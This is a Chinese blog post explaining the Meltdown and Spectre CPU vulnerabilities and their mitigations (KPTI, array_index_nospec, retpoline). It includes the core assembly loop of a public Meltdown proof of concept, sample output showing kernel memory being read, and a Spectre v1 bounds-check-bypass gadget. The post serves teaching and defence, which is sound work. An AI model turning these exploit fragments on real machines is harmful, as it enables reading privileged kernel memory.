https://zhuanlan.zhihu.com/p/263081764
Meltdown/Spectre在2018年初闹得沸沸扬扬, 可以说是有史以来最有影响的cpu漏洞了. 当时有过简单了解, 但是不够深入, 这两天重新又看了一下.
cpu的乱序执行一般都使用Tomasulo算法, x86也不例外, 主要包括:
该算法虽然是乱序执行, 但是会顺序完成 (retire), 只有在retire后它的输出才会architectually visible (简单地说, 不影响程序逻辑), 但是没有architectually visible不等于没有影响, 当输出更新到reservation station后, 因为cdb的存在, 其他指令已经可以读到. 另外, 非常重要的一点, 异常只有在指令retire的时候才会触发, 对于上面的例子, 即使cpu已经检查到第一条指令没有访问权限, 也只能等到该指令retire时才会触发, 取决于该指令在ROB的位置, 可能马上触发也可能很久之后, ROB容量可以很容易做到比如192这个级别.
这幅图可以对ROB有个大致了解:
Meltdown/Spectre使用的都是旁路攻击(Side Channel Attack), 这里引用What Is a Side Channel Attack的描述:
Side channel attacks take advantage of patterns in the information exhaust that computers constantly give off: the electric emissions from a computer's monitor or hard drive, for instance, that emanate slightly differently depending on what information is crossing the screen or being read by the drive's magnetic head. Or the fact that computer components draw different amounts of power when carrying out certain processes. Or that a keyboard's click-clacking can reveal a user's password through sound alone.
Meltdown/Spectre利用了旁路攻击的一种常见手段Flush+Reload, CPU访问DRAM和cache的时间有数量级差异, 所以通过衡量时间就可以判断出数据是否在cache里面.
投机执行(Speculative Execution)本质上是乱序执行的一种, 存在条件判断的时候, cpu如果预测该分支为true, 则投机执行里面的语句.
Indirect JMP and CALL instructions consult the indirect branch predictor to direct speculative execution to the most likely target of the branch. The indirect branch predictor is a relatively large hardware structure which cannot be easily managed by the operating system.
Prediction of RET instructions differs from JMP and CALL instructions because RET first relies on the Return Stack Buffer (RSB). In contrast to the indirect branch predictors RSB is a last-in-first-out (LIFO) stack where CALL instructions “push”entries and RET instructions “pop” entries. This mechanism is amenable to predictable software control.
Spectre Attacks: Exploiting Speculative Execution
Return-Oriented Programming (ROP) [63] is a technique that allows an attacker who hijacks control flow to make a victim perform complex operations by chaining together machine code snippets, called gadgets, found in the code of the vulnerable victim. More specifically, the attacker first finds usable gadgets in the victim binary. Each gadget performs some computation before executing a return instruction.
Meltdown and Spectre - Usenix LISA 2018
A“gadget”is a piece of existing code in an (unmodified) existing program binary. For example code contained within the Linux kernel, or in another “victim” application
A malicious actor influences program control flow to cause gadget code to run
Gadget code performs some action of interest to the attacker
For example loading sensitive secrets from privileged memory
The code following the bounds check is known as a “gadget”
先看一个meltdown的示例程序, 普通权限用户通过它能够读出kernel space中0xffffffff81a000e0的内容, 以下是攻击者的代码:
char data = *(char*) 0xffffffff81a000e0;
array[data * 4096] = 0;
其中0xffffffff81a000e0是位于kernel space的地址, 选择这个位置是因为它里面是确定的值, 方便验证方法是否有效:
# sudo grep linux_banner /proc/kallsyms
ffffffff81a000e0 R linux_banner
按照正常的理解, 第一条语句访问内核地址会触发异常, 所以不能获得data值. Meltdown利用了以下因素:
以这个为例: https://github.com/paboldin/meltdown-exploit, 里面主要逻辑如下:
asm volatile (
"1:\n\t"
".rept 300\n\t"
"add $0x141, %%rax\n\t"
".endr\n\t"
"movzx (%[addr]), %%eax\n\t"
"shl $12, %%rax\n\t"
"jz 1b\n\t"
"movzx (%[target], %%rax, 1), %%rbx\n"
"stopspeculate: \n\t"
"nop\n\t"
:
: [target] "r" (target_array),
[addr] "r" (addr)
: "rax", "rbx"
);
执行结果如下:
cached = 31, uncached = 336, threshold 102
read ffffffff8164e080 = 25 % (score=999/1000)
read ffffffff8164e081 = 73 s (score=1000/1000)
read ffffffff8164e082 = 20 (score=996/1000)
read ffffffff8164e083 = 76 v (score=999/1000)
read ffffffff8164e084 = 65 e (score=999/1000)
read ffffffff8164e085 = 72 r (score=1000/1000)
read ffffffff8164e086 = 73 s (score=999/1000)
read ffffffff8164e087 = 69 i (score=1000/1000)
read ffffffff8164e088 = 6f o (score=1000/1000)
read ffffffff8164e089 = 6e n (score=999/1000)
read ffffffff8164e08a = 20 (score=1000/1000)
read ffffffff8164e08b = 25 % (score=1000/1000)
read ffffffff8164e08c = 73 s (score=1000/1000)
read ffffffff8164e08d = 20 (score=1000/1000)
read ffffffff8164e08e = 29 ( (score=998/1000)
read ffffffff8164e08f = 61 % (score=999/1000)
可以看到上面的score都非常高, 说明通过Flush+Reload是很有效的. 代码里面关键的几点:
继续来看4-6行的作用, 首先看到在上面的汇编代码执行之前, 执行了语句:
_mm_mfence();
先把它删掉, 重新执行还是能够读出数据, 但是score很多已经到个位数了, 说明已经不能稳定读出数据了. 更进一步, 把其中rept的指令改成:
mov $0x141, %%rax
此时已经完全不能读出数据了, 即使把mfence加回来也无济于事. 这是因为meltdown要攻击成功, 需要时间窗口, 越权访问那条指令必须在第二条指令加载数据到cache之后(or in flight?) retire, 否则触发异常从而会中断乱序执行. 从测试可以知道:
Kernel Page Table Isolation (KPTI) 中user space对应的页表已经没有kernel space的内容, 这样就不能访问到kernel的数据了, 不管有没有乱序执行.
Whereas current systems have a single set of page tables for each process, KAISER implements two. One set is essentially unchanged; it includes both kernel-space and user-space addresses, but it is only used when the system is running in kernel mode. The second "shadow" page table contains a copy of all of the user-space mappings, but leaves out the kernel side. Instead, there is a minimal set of kernel-space mappings that provides the information needed to handle system calls and interrupts, but no more. Copying the page tables may sound inefficient, but the copying only happens at the top level of the page-table hierarchy, so the bulk of that data is shared between the two copies.
Whenever a process is running in user mode, the shadow page tables will be active. The bulk of the kernel's address space will thus be completely hidden from the process, defeating the known hardware-based attacks. Whenever the system needs to switch to kernel mode, in response to a system call, an exception, or an interrupt, for example, a switch to the other page tables will be made. The code that manages the return to user space must then make the shadow page tables active again.
以下代码中即使if条件为false, cpu仍然可能先投机执行第二条语句, 从而访问到不应该访问的数据array1[x], 其中x >= array1_size, 所以这种攻击也称为Bounds Check Bypass.
if (x < array1_size)
y = array2[array1[x] * 4096];
上面是victim的代码, 为了完成攻击:
一般来说要同时满足条件1,2,3并不容易, 但是eBPF可以比较容易构造, 毕竟可以自己写eBPF脚本.
防御的思路是: 即使投机执行了错误路径也不会泄露信息, 这种方式比较简单:
/*
* array_index_nospec - sanitize an array index after a bounds check
*
* For a code sequence like:
*
* if (index < size) {
* index = array_index_nospec(index, size);
* val = array[index];
* }
*
* ...if the CPU speculates past the bounds check then
* array_index_nospec() will clamp the index within the range of [0,
* size).
*/
#define array_index_nospec(index, size) \
({ \
typeof(index) _i = (index); \
typeof(size) _s = (size); \
unsigned long _mask = array_index_mask_nospec(_i, _s); \
\
BUILD_BUG_ON(sizeof(_i) > sizeof(long)); \
BUILD_BUG_ON(sizeof(_s) > sizeof(long)); \
\
(typeof(_i)) (_i & _mask); \
})
v1通过bypass bounds check, 可以在选择2条不同的执行路径, 而v2通过训练indirect branch, 理论上可以引诱cpu[错误路径]去执行任意gadget.
Retpoline通过把jmp/call指令转换为ret解决分支预测的问题, 也即把分支预测由BTB转移到了RSB, 注意软件可以很方便地控制RSB (underflow问题这里不讨论).
这里一jmp指令的indirect branch为例:
关键点在于ret导致的分支预测采用了RSB的内容, 而该内容是在call的时候产生的, 也就是上面的语句2. 所以即使针对ret的分支预测错了, 语句2并不会泄漏任何信息, 最后ret语句读到(%rsp)的内容, 该值和RSB里的值不符, 投机执行结束, 它没产生任何正向效果, 但是也没有任何负面效果.